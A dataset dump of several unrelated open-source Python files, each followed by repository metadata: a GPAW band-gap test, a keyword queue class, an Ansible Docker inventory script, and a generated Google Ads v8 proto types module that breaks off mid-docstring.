response = calc.hamiltonian.xc.xcs['RESPONSE']
response.calculate_delta_xc(homolumo=homolumo)
calc.write('CGLLBSC.gpw')
# Redo the band structure calculation
atoms, calc = restart('CGLLBSC.gpw', kpts=kpts, fixdensity=True, usesymm=None, convergence=dict(bands=6))
atoms.get_potential_energy()
response = calc.hamiltonian.xc.xcs['RESPONSE']
KS, dxc = response.calculate_delta_xc_perturbation()
assert abs(KS+dxc-5.41)<0.10
#M. Kuisma et. al, Phys. Rev. B 82, 115106, QP gap for C, 5.41eV, expt. 5.48eV
|
gpl-3.0
| 7,119,025,400,674,546,000
| 30.985075
| 105
| 0.728885
| false
| 2.747436
| false
| false
| false
|
discoapi/discotech
|
discotech/discoAPI/keywordManager.py
|
1
|
3203
|
__package__ = 'discotech.discoAPI'
from discotech import discotechError
class KeywordManager(object):
"""
Simple object to store and queue keyword to search in social media providers
"""
def __init__(self,keywords = [],convertToSearchPhrases = False):
"""
@type keywords: list
@param keywords: the keyword you want search for
@type convertToSearchPhrases: bool
@param convertToSearchPhrases: whether keyword should be conveted to matching search phrases for example 'spider man' => ['spider','man','spiderman','spider_man']
"""
if keywords:
self.keywords = self._keyworsToSearchPhrases(keywords) if convertToSearchPhrases else list(keywords)
self._keywordCount = len(self.keywords)
self._headLocation = 0
else:
self.keywords = keywords
def dequque(self):
"""
dequque a keyword from the queue, the keyword is then moved to the end of the queue
@return: the next keyword in queue
"""
if not self.keywords:
raise discotechError("you don't any keywords")
retValue = self.keywords[self._headLocation]
# move head next
self._headLocation = (self._headLocation + 1) % self._keywordCount
return retValue
def _updateFromList(self,keywords):
self.keywords = list(keywords)
self._keywordCount = len(self.keywords)
self._headLocation = 0
def _updateFromDict(self,config):
if 'keywords' in config:
convertToSearchPhrases = False
if 'search_phrase' in config and config['search_phrase'] is True:
convertToSearchPhrases = True
self.keywords = self._keyworsToSearchPhrases(config['keywords']) if convertToSearchPhrases else list(config['keywords'])
self._keywordCount = len(self.keywords)
self._headLocation = 0
else:
raise discotechError("no keywords were given")
def _keyworToSearchPhrases(self,keyword):
words = keyword.split(' ')
#edge case
if len(words) == 1:
return words
cleanWords = []
#cleanup stage
for word in words:
word = word.strip()
if word != '':
cleanWords.append(word)
#combinator stage
combinators = ['','_']
combinedWords = []
for combinator in combinators:
combinedWords.append(combinator.join(cleanWords))
return cleanWords + combinedWords
def _keyworsToSearchPhrases(self,keywords):
retList = []
for keyword in keywords:
retList += self._keyworToSearchPhrases(keyword)
return retList
def loadConfig(self,config):
"""
load keywords from a configuation
@type config: list | str
@param config: a list of keywords or a path or address of JSON configuration file
"""
#if it's list
if type(config) is list:
self._updateFromList(config)
#if it's a dict
if type(config) is dict:
self._updateFromDict(config)
#if it's string
if type(config) is str:
#could be an address
if config.startswith('http://') or config.startswith('https://'):
configFile = getUrlContents(config)
confList = json.loads(configFile['response_text'])
#recursivly call yourself
return self.loadConfig(confList)
#could be file name
confFile = open(config,'r')
confLisr = json.loads(confFile.read())
#recursivly call yourself
return self.loadConfig(confList)
|
gpl-2.0
| -1,382,077,788,170,863,000
| 27.345133
| 163
| 0.70153
| false
| 3.496725
| true
| false
| false
|
ioggstream/python-course
|
ansible-101/notebooks/exercise-05/inventory-docker-solution.py
|
1
|
1376
|
#!/usr/bin/env python
# List our containers. Note: this only works with docker-compose containers.
from __future__ import print_function
from collections import defaultdict
import json
#
# Manage different docker libraries
#
try:
from docker import Client
except ImportError:
from docker import APIClient as Client
import logging
log = logging.getLogger()
logging.basicConfig(level=logging.DEBUG)
def print_hosts():
c=Client(base_url="http://172.17.0.1:2375")
container_fmt = lambda x: (
x['Names'][0][1:],
x['NetworkSettings']['Networks']['bridge']['IPAddress'],
)
inventory = dict()
for x in c.containers():
log.debug("Processing entry %r", '\t\t'.join(container_fmt(x)))
try:
group_name = x['Labels']['com.docker.compose.service']
ip_address = x['NetworkSettings']['Networks']['bridge']['IPAddress']
if group_name not in inventory:
inventory[group_name] = defaultdict(list)
inventory[group_name]['hosts'].append(ip_address)
except KeyError:
log.warning("Host not run via docker-compose: skipping")
inventory['web']['host_vars'] = {'ansible_ssh_common_args': ' -o StrictHostKeyChecking=no '}
ret = json.dumps(inventory, indent=True)
return ret
if __name__ == '__main__':
print(print_hosts())
|
agpl-3.0
| -8,088,468,184,198,138,000
| 28.913043
| 96
| 0.634448
| false
| 3.965418
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/common/types/ad_type_infos.py
|
1
|
46175
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v8.common.types import ad_asset
from google.ads.googleads.v8.enums.types import call_conversion_reporting_state
from google.ads.googleads.v8.enums.types import display_ad_format_setting
from google.ads.googleads.v8.enums.types import display_upload_product_type as gage_display_upload_product_type
from google.ads.googleads.v8.enums.types import legacy_app_install_ad_app_store
from google.ads.googleads.v8.enums.types import mime_type as gage_mime_type
__protobuf__ = proto.module(
package='google.ads.googleads.v8.common',
marshal='google.ads.googleads.v8',
manifest={
'TextAdInfo',
'ExpandedTextAdInfo',
'ExpandedDynamicSearchAdInfo',
'HotelAdInfo',
'ShoppingSmartAdInfo',
'ShoppingProductAdInfo',
'ShoppingComparisonListingAdInfo',
'GmailAdInfo',
'GmailTeaser',
'DisplayCallToAction',
'ProductImage',
'ProductVideo',
'ImageAdInfo',
'VideoBumperInStreamAdInfo',
'VideoNonSkippableInStreamAdInfo',
'VideoTrueViewInStreamAdInfo',
'VideoOutstreamAdInfo',
'VideoTrueViewDiscoveryAdInfo',
'VideoAdInfo',
'VideoResponsiveAdInfo',
'ResponsiveSearchAdInfo',
'LegacyResponsiveDisplayAdInfo',
'AppAdInfo',
'AppEngagementAdInfo',
'LegacyAppInstallAdInfo',
'ResponsiveDisplayAdInfo',
'LocalAdInfo',
'DisplayUploadAdInfo',
'ResponsiveDisplayAdControlSpec',
'SmartCampaignAdInfo',
'CallAdInfo',
},
)
class TextAdInfo(proto.Message):
r"""A text ad.
Attributes:
headline (str):
The headline of the ad.
description1 (str):
The first line of the ad's description.
description2 (str):
The second line of the ad's description.
"""
headline = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class ExpandedTextAdInfo(proto.Message):
r"""An expanded text ad.
Attributes:
headline_part1 (str):
The first part of the ad's headline.
headline_part2 (str):
The second part of the ad's headline.
headline_part3 (str):
The third part of the ad's headline.
description (str):
The description of the ad.
description2 (str):
The second description of the ad.
path1 (str):
The text that can appear alongside the ad's
displayed URL.
path2 (str):
Additional text that can appear alongside the
ad's displayed URL.
"""
headline_part1 = proto.Field(
proto.STRING,
number=8,
optional=True,
)
headline_part2 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
headline_part3 = proto.Field(
proto.STRING,
number=10,
optional=True,
)
description = proto.Field(
proto.STRING,
number=11,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=12,
optional=True,
)
path1 = proto.Field(
proto.STRING,
number=13,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=14,
optional=True,
)
class ExpandedDynamicSearchAdInfo(proto.Message):
r"""An expanded dynamic search ad.
Attributes:
description (str):
The description of the ad.
description2 (str):
The second description of the ad.
"""
description = proto.Field(
proto.STRING,
number=3,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class HotelAdInfo(proto.Message):
r"""A hotel ad. """
class ShoppingSmartAdInfo(proto.Message):
r"""A Smart Shopping ad. """
class ShoppingProductAdInfo(proto.Message):
r"""A standard Shopping ad. """
class ShoppingComparisonListingAdInfo(proto.Message):
r"""A Shopping Comparison Listing ad.
Attributes:
headline (str):
Headline of the ad. This field is required.
Allowed length is between 25 and 45 characters.
"""
headline = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class GmailAdInfo(proto.Message):
r"""A Gmail ad.
Attributes:
teaser (google.ads.googleads.v8.common.types.GmailTeaser):
The Gmail teaser.
header_image (str):
The MediaFile resource name of the header
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 300x100 pixels and the
aspect ratio must be between 3:1 and 5:1 (+-1%).
marketing_image (str):
The MediaFile resource name of the marketing
image. Valid image types are GIF, JPEG and PNG.
The image must either be landscape with a
minimum size of 600x314 pixels and aspect ratio
of 600:314 (+-1%) or square with a minimum size
of 300x300 pixels and aspect ratio of 1:1 (+-1%)
marketing_image_headline (str):
Headline of the marketing image.
marketing_image_description (str):
Description of the marketing image.
marketing_image_display_call_to_action (google.ads.googleads.v8.common.types.DisplayCallToAction):
Display-call-to-action of the marketing
image.
product_images (Sequence[google.ads.googleads.v8.common.types.ProductImage]):
Product images. Up to 15 images are
supported.
product_videos (Sequence[google.ads.googleads.v8.common.types.ProductVideo]):
Product videos. Up to 7 videos are supported.
At least one product video or a marketing image
must be specified.
"""
teaser = proto.Field(
proto.MESSAGE,
number=1,
message='GmailTeaser',
)
header_image = proto.Field(
proto.STRING,
number=10,
optional=True,
)
marketing_image = proto.Field(
proto.STRING,
number=11,
optional=True,
)
marketing_image_headline = proto.Field(
proto.STRING,
number=12,
optional=True,
)
marketing_image_description = proto.Field(
proto.STRING,
number=13,
optional=True,
)
marketing_image_display_call_to_action = proto.Field(
proto.MESSAGE,
number=6,
message='DisplayCallToAction',
)
product_images = proto.RepeatedField(
proto.MESSAGE,
number=7,
message='ProductImage',
)
product_videos = proto.RepeatedField(
proto.MESSAGE,
number=8,
message='ProductVideo',
)
class GmailTeaser(proto.Message):
r"""Gmail teaser data. The teaser is a small header that acts as
an invitation to view the rest of the ad (the body).
Attributes:
headline (str):
Headline of the teaser.
description (str):
Description of the teaser.
business_name (str):
Business name of the advertiser.
logo_image (str):
The MediaFile resource name of the logo
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 144x144 pixels and the
aspect ratio must be 1:1 (+-1%).
"""
headline = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description = proto.Field(
proto.STRING,
number=6,
optional=True,
)
business_name = proto.Field(
proto.STRING,
number=7,
optional=True,
)
logo_image = proto.Field(
proto.STRING,
number=8,
optional=True,
)
class DisplayCallToAction(proto.Message):
r"""Data for display call to action. The call to action is a
piece of the ad that prompts the user to do something. Like
clicking a link or making a phone call.
Attributes:
text (str):
Text for the display-call-to-action.
text_color (str):
Text color for the display-call-to-action in
hexadecimal, e.g. #ffffff for white.
url_collection_id (str):
Identifies the url collection in the ad.url_collections
field. If not set the url defaults to final_url.
"""
text = proto.Field(
proto.STRING,
number=5,
optional=True,
)
text_color = proto.Field(
proto.STRING,
number=6,
optional=True,
)
url_collection_id = proto.Field(
proto.STRING,
number=7,
optional=True,
)
class ProductImage(proto.Message):
r"""Product image specific data.
Attributes:
product_image (str):
The MediaFile resource name of the product
image. Valid image types are GIF, JPEG and PNG.
The minimum size is 300x300 pixels and the
aspect ratio must be 1:1 (+-1%).
description (str):
Description of the product.
display_call_to_action (google.ads.googleads.v8.common.types.DisplayCallToAction):
Display-call-to-action of the product image.
"""
product_image = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description = proto.Field(
proto.STRING,
number=5,
optional=True,
)
display_call_to_action = proto.Field(
proto.MESSAGE,
number=3,
message='DisplayCallToAction',
)
class ProductVideo(proto.Message):
r"""Product video specific data.
Attributes:
product_video (str):
The MediaFile resource name of a video which
must be hosted on YouTube.
"""
product_video = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class ImageAdInfo(proto.Message):
r"""An image ad.
Attributes:
pixel_width (int):
Width in pixels of the full size image.
pixel_height (int):
Height in pixels of the full size image.
image_url (str):
URL of the full size image.
preview_pixel_width (int):
Width in pixels of the preview size image.
preview_pixel_height (int):
Height in pixels of the preview size image.
preview_image_url (str):
URL of the preview size image.
mime_type (google.ads.googleads.v8.enums.types.MimeTypeEnum.MimeType):
The mime type of the image.
name (str):
The name of the image. If the image was
created from a MediaFile, this is the
MediaFile's name. If the image was created from
bytes, this is empty.
media_file (str):
The MediaFile resource to use for the image.
data (bytes):
Raw image data as bytes.
ad_id_to_copy_image_from (int):
An ad ID to copy the image from.
"""
pixel_width = proto.Field(
proto.INT64,
number=15,
optional=True,
)
pixel_height = proto.Field(
proto.INT64,
number=16,
optional=True,
)
image_url = proto.Field(
proto.STRING,
number=17,
optional=True,
)
preview_pixel_width = proto.Field(
proto.INT64,
number=18,
optional=True,
)
preview_pixel_height = proto.Field(
proto.INT64,
number=19,
optional=True,
)
preview_image_url = proto.Field(
proto.STRING,
number=20,
optional=True,
)
mime_type = proto.Field(
proto.ENUM,
number=10,
enum=gage_mime_type.MimeTypeEnum.MimeType,
)
name = proto.Field(
proto.STRING,
number=21,
optional=True,
)
media_file = proto.Field(
proto.STRING,
number=12,
oneof='image',
)
data = proto.Field(
proto.BYTES,
number=13,
oneof='image',
)
ad_id_to_copy_image_from = proto.Field(
proto.INT64,
number=14,
oneof='image',
)
class VideoBumperInStreamAdInfo(proto.Message):
r"""Representation of video bumper in-stream ad format (very
short in-stream non-skippable video ad).
Attributes:
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
companion_banner = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class VideoNonSkippableInStreamAdInfo(proto.Message):
r"""Representation of video non-skippable in-stream ad format (15
second in-stream non-skippable video ad).
Attributes:
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
companion_banner = proto.Field(
proto.STRING,
number=2,
optional=True,
)
class VideoTrueViewInStreamAdInfo(proto.Message):
r"""Representation of video TrueView in-stream ad format (ad
shown during video playback, often at beginning, which displays
a skip button a few seconds into the video).
Attributes:
action_button_label (str):
Label on the CTA (call-to-action) button
taking the user to the video ad's final URL.
Required for TrueView for action campaigns,
optional otherwise.
action_headline (str):
Additional text displayed with the CTA (call-
o-action) button to give context and encourage
clicking on the button.
companion_banner (str):
The MediaFile resource name of the companion
banner used with the ad.
"""
action_button_label = proto.Field(
proto.STRING,
number=4,
optional=True,
)
action_headline = proto.Field(
proto.STRING,
number=5,
optional=True,
)
companion_banner = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class VideoOutstreamAdInfo(proto.Message):
r"""Representation of video out-stream ad format (ad shown
alongside a feed with automatic playback, without sound).
Attributes:
headline (str):
The headline of the ad.
description (str):
The description line.
"""
headline = proto.Field(
proto.STRING,
number=3,
optional=True,
)
description = proto.Field(
proto.STRING,
number=4,
optional=True,
)
class VideoTrueViewDiscoveryAdInfo(proto.Message):
r"""Representation of video TrueView discovery ad format.
Attributes:
headline (str):
The headline of the ad.
description1 (str):
First text line for a TrueView video
discovery ad.
description2 (str):
Second text line for a TrueView video
discovery ad.
"""
headline = proto.Field(
proto.STRING,
number=4,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class VideoAdInfo(proto.Message):
r"""A video ad.
Attributes:
media_file (str):
The MediaFile resource to use for the video.
in_stream (google.ads.googleads.v8.common.types.VideoTrueViewInStreamAdInfo):
Video TrueView in-stream ad format.
bumper (google.ads.googleads.v8.common.types.VideoBumperInStreamAdInfo):
Video bumper in-stream ad format.
out_stream (google.ads.googleads.v8.common.types.VideoOutstreamAdInfo):
Video out-stream ad format.
non_skippable (google.ads.googleads.v8.common.types.VideoNonSkippableInStreamAdInfo):
Video non-skippable in-stream ad format.
discovery (google.ads.googleads.v8.common.types.VideoTrueViewDiscoveryAdInfo):
Video TrueView discovery ad format.
"""
media_file = proto.Field(
proto.STRING,
number=7,
optional=True,
)
in_stream = proto.Field(
proto.MESSAGE,
number=2,
oneof='format',
message='VideoTrueViewInStreamAdInfo',
)
bumper = proto.Field(
proto.MESSAGE,
number=3,
oneof='format',
message='VideoBumperInStreamAdInfo',
)
out_stream = proto.Field(
proto.MESSAGE,
number=4,
oneof='format',
message='VideoOutstreamAdInfo',
)
non_skippable = proto.Field(
proto.MESSAGE,
number=5,
oneof='format',
message='VideoNonSkippableInStreamAdInfo',
)
discovery = proto.Field(
proto.MESSAGE,
number=6,
oneof='format',
message='VideoTrueViewDiscoveryAdInfo',
)
class VideoResponsiveAdInfo(proto.Message):
r"""A video responsive ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the short
headline, e.g. the "Call To Action" banner.
Currently, only a single value for the short
headline is supported.
long_headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the long
headline. Currently, only a single value for the
long headline is supported.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the description.
Currently, only a single value for the
description is supported.
call_to_actions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets used for the button, e.g.
the "Call To Action" button. Currently, only a
single value for the button is supported.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets used for the ad.
Currently, only a single value for the YouTube
video asset is supported.
companion_banners (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets used for the companion
banner. Currently, only a single value for the
companion banner asset is supported.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
long_headlines = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
call_to_actions = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdTextAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdVideoAsset,
)
companion_banners = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdImageAsset,
)
class ResponsiveSearchAdInfo(proto.Message):
r"""A responsive search ad.
Responsive search ads let you create an ad that adapts to show
more text, and more relevant messages, to your customers. Enter
multiple headlines and descriptions when creating a responsive
search ad, and over time, Google Ads will automatically test
different combinations and learn which combinations perform
best. By adapting your ad's content to more closely match
potential customers' search terms, responsive search ads may
improve your campaign's performance.
More information at https://support.google.com/google-
ads/answer/7684791
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
path1 (str):
First part of text that may appear appended
to the url displayed in the ad.
path2 (str):
Second part of text that may appear appended
to the url displayed in the ad. This field can
only be set when path1 is also set.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
path1 = proto.Field(
proto.STRING,
number=5,
optional=True,
)
path2 = proto.Field(
proto.STRING,
number=6,
optional=True,
)
class LegacyResponsiveDisplayAdInfo(proto.Message):
r"""A legacy responsive display ad. Ads of this type are labeled
'Responsive ads' in the Google Ads UI.
Attributes:
short_headline (str):
The short version of the ad's headline.
long_headline (str):
The long version of the ad's headline.
description (str):
The description of the ad.
business_name (str):
The business name in the ad.
allow_flexible_color (bool):
Advertiser's consent to allow flexible color. When true, the
ad may be served with different color if necessary. When
false, the ad will be served with the specified colors or a
neutral color. The default value is true. Must be true if
main_color and accent_color are not set.
accent_color (str):
The accent color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
main_color (str):
The main color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
call_to_action_text (str):
The call-to-action text for the ad.
logo_image (str):
The MediaFile resource name of the logo image
used in the ad.
square_logo_image (str):
The MediaFile resource name of the square
logo image used in the ad.
marketing_image (str):
The MediaFile resource name of the marketing
image used in the ad.
square_marketing_image (str):
The MediaFile resource name of the square
marketing image used in the ad.
format_setting (google.ads.googleads.v8.enums.types.DisplayAdFormatSettingEnum.DisplayAdFormatSetting):
Specifies which format the ad will be served in. Default is
ALL_FORMATS.
price_prefix (str):
Prefix before price. E.g. 'as low as'.
promo_text (str):
Promotion text used for dynamic formats of
responsive ads. For example 'Free two-day
shipping'.
"""
short_headline = proto.Field(
proto.STRING,
number=16,
optional=True,
)
long_headline = proto.Field(
proto.STRING,
number=17,
optional=True,
)
description = proto.Field(
proto.STRING,
number=18,
optional=True,
)
business_name = proto.Field(
proto.STRING,
number=19,
optional=True,
)
allow_flexible_color = proto.Field(
proto.BOOL,
number=20,
optional=True,
)
accent_color = proto.Field(
proto.STRING,
number=21,
optional=True,
)
main_color = proto.Field(
proto.STRING,
number=22,
optional=True,
)
call_to_action_text = proto.Field(
proto.STRING,
number=23,
optional=True,
)
logo_image = proto.Field(
proto.STRING,
number=24,
optional=True,
)
square_logo_image = proto.Field(
proto.STRING,
number=25,
optional=True,
)
marketing_image = proto.Field(
proto.STRING,
number=26,
optional=True,
)
square_marketing_image = proto.Field(
proto.STRING,
number=27,
optional=True,
)
format_setting = proto.Field(
proto.ENUM,
number=13,
enum=display_ad_format_setting.DisplayAdFormatSettingEnum.DisplayAdFormatSetting,
)
price_prefix = proto.Field(
proto.STRING,
number=28,
optional=True,
)
promo_text = proto.Field(
proto.STRING,
number=29,
optional=True,
)
class AppAdInfo(proto.Message):
r"""An app ad.
Attributes:
mandatory_ad_text (google.ads.googleads.v8.common.types.AdTextAsset):
Mandatory ad text.
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets that may be displayed
with the ad.
youtube_videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of YouTube video assets that may be
displayed with the ad.
html5_media_bundles (Sequence[google.ads.googleads.v8.common.types.AdMediaBundleAsset]):
List of media bundle assets that may be used
with the ad.
"""
mandatory_ad_text = proto.Field(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
headlines = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdTextAsset,
)
images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
youtube_videos = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdVideoAsset,
)
html5_media_bundles = proto.RepeatedField(
proto.MESSAGE,
number=6,
message=ad_asset.AdMediaBundleAsset,
)
class AppEngagementAdInfo(proto.Message):
r"""App engagement ads allow you to write text encouraging a
specific action in the app, like checking in, making a purchase,
or booking a flight. They allow you to send users to a specific
part of your app where they can find what they're looking for
easier and faster.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list.
images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
List of image assets that may be displayed
with the ad.
videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
List of video assets that may be displayed
with the ad.
"""
headlines = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdTextAsset,
)
images = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdImageAsset,
)
videos = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdVideoAsset,
)
class LegacyAppInstallAdInfo(proto.Message):
r"""A legacy app install ad that only can be used by a few select
customers.
Attributes:
app_id (str):
The id of the mobile app.
app_store (google.ads.googleads.v8.enums.types.LegacyAppInstallAdAppStoreEnum.LegacyAppInstallAdAppStore):
The app store the mobile app is available in.
headline (str):
The headline of the ad.
description1 (str):
The first description line of the ad.
description2 (str):
The second description line of the ad.
"""
app_id = proto.Field(
proto.STRING,
number=6,
optional=True,
)
app_store = proto.Field(
proto.ENUM,
number=2,
enum=legacy_app_install_ad_app_store.LegacyAppInstallAdAppStoreEnum.LegacyAppInstallAdAppStore,
)
headline = proto.Field(
proto.STRING,
number=7,
optional=True,
)
description1 = proto.Field(
proto.STRING,
number=8,
optional=True,
)
description2 = proto.Field(
proto.STRING,
number=9,
optional=True,
)
class ResponsiveDisplayAdInfo(proto.Message):
r"""A responsive display ad.
Attributes:
marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Marketing images to be used in the ad. Valid image types are
GIF, JPEG, and PNG. The minimum size is 600x314 and the
aspect ratio must be 1.91:1 (+-1%). At least one
marketing_image is required. Combined with
square_marketing_images the maximum is 15.
square_marketing_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Square marketing images to be used in the ad. Valid image
types are GIF, JPEG, and PNG. The minimum size is 300x300
and the aspect ratio must be 1:1 (+-1%). At least one square
marketing_image is required. Combined with marketing_images
the maximum is 15.
logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Logo images to be used in the ad. Valid image types are GIF,
JPEG, and PNG. The minimum size is 512x128 and the aspect
ratio must be 4:1 (+-1%). Combined with square_logo_images
the maximum is 5.
square_logo_images (Sequence[google.ads.googleads.v8.common.types.AdImageAsset]):
Square logo images to be used in the ad. Valid image types
are GIF, JPEG, and PNG. The minimum size is 128x128 and the
aspect ratio must be 1:1 (+-1%). Combined with
square_logo_images the maximum is 5.
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
Short format headlines for the ad. The
maximum length is 30 characters. At least 1 and
max 5 headlines can be specified.
long_headline (google.ads.googleads.v8.common.types.AdTextAsset):
A required long format headline. The maximum
length is 90 characters.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
Descriptive texts for the ad. The maximum
length is 90 characters. At least 1 and max 5
headlines can be specified.
youtube_videos (Sequence[google.ads.googleads.v8.common.types.AdVideoAsset]):
Optional YouTube videos for the ad. A maximum
of 5 videos can be specified.
business_name (str):
The advertiser/brand name. Maximum display
width is 25.
main_color (str):
The main color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
accent_color (str):
The accent color of the ad in hexadecimal, e.g. #ffffff for
white. If one of main_color and accent_color is set, the
other is required as well.
allow_flexible_color (bool):
Advertiser's consent to allow flexible color. When true, the
ad may be served with different color if necessary. When
false, the ad will be served with the specified colors or a
neutral color. The default value is true. Must be true if
main_color and accent_color are not set.
call_to_action_text (str):
The call-to-action text for the ad. Maximum
display width is 30.
price_prefix (str):
Prefix before price. E.g. 'as low as'.
promo_text (str):
Promotion text used for dynamic formats of
responsive ads. For example 'Free two-day
shipping'.
format_setting (google.ads.googleads.v8.enums.types.DisplayAdFormatSettingEnum.DisplayAdFormatSetting):
Specifies which format the ad will be served in. Default is
ALL_FORMATS.
control_spec (google.ads.googleads.v8.common.types.ResponsiveDisplayAdControlSpec):
Specification for various creative controls.
"""
marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=1,
message=ad_asset.AdImageAsset,
)
square_marketing_images = proto.RepeatedField(
proto.MESSAGE,
number=2,
message=ad_asset.AdImageAsset,
)
logo_images = proto.RepeatedField(
proto.MESSAGE,
number=3,
message=ad_asset.AdImageAsset,
)
square_logo_images = proto.RepeatedField(
proto.MESSAGE,
number=4,
message=ad_asset.AdImageAsset,
)
headlines = proto.RepeatedField(
proto.MESSAGE,
number=5,
message=ad_asset.AdTextAsset,
)
long_headline = proto.Field(
proto.MESSAGE,
number=6,
message=ad_asset.AdTextAsset,
)
descriptions = proto.RepeatedField(
proto.MESSAGE,
number=7,
message=ad_asset.AdTextAsset,
)
youtube_videos = proto.RepeatedField(
proto.MESSAGE,
number=8,
message=ad_asset.AdVideoAsset,
)
business_name = proto.Field(
proto.STRING,
number=17,
optional=True,
)
main_color = proto.Field(
proto.STRING,
number=18,
optional=True,
)
accent_color = proto.Field(
proto.STRING,
number=19,
optional=True,
)
allow_flexible_color = proto.Field(
proto.BOOL,
number=20,
optional=True,
)
call_to_action_text = proto.Field(
proto.STRING,
number=21,
optional=True,
)
price_prefix = proto.Field(
proto.STRING,
number=22,
optional=True,
)
promo_text = proto.Field(
proto.STRING,
number=23,
optional=True,
)
format_setting = proto.Field(
proto.ENUM,
number=16,
enum=display_ad_format_setting.DisplayAdFormatSettingEnum.DisplayAdFormatSetting,
)
control_spec = proto.Field(
proto.MESSAGE,
number=24,
message='ResponsiveDisplayAdControlSpec',
)
class LocalAdInfo(proto.Message):
r"""A local ad.
Attributes:
headlines (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for headlines. When the
ad serves the headlines will be selected from
this list. At least 1 and at most 5 headlines
must be specified.
descriptions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for descriptions. When
the ad serves the descriptions will be selected
from this list. At least 1 and at most 5
descriptions must be specified.
call_to_actions (Sequence[google.ads.googleads.v8.common.types.AdTextAsset]):
List of text assets for call-to-actions. When
the ad serves the call-to-actions will be
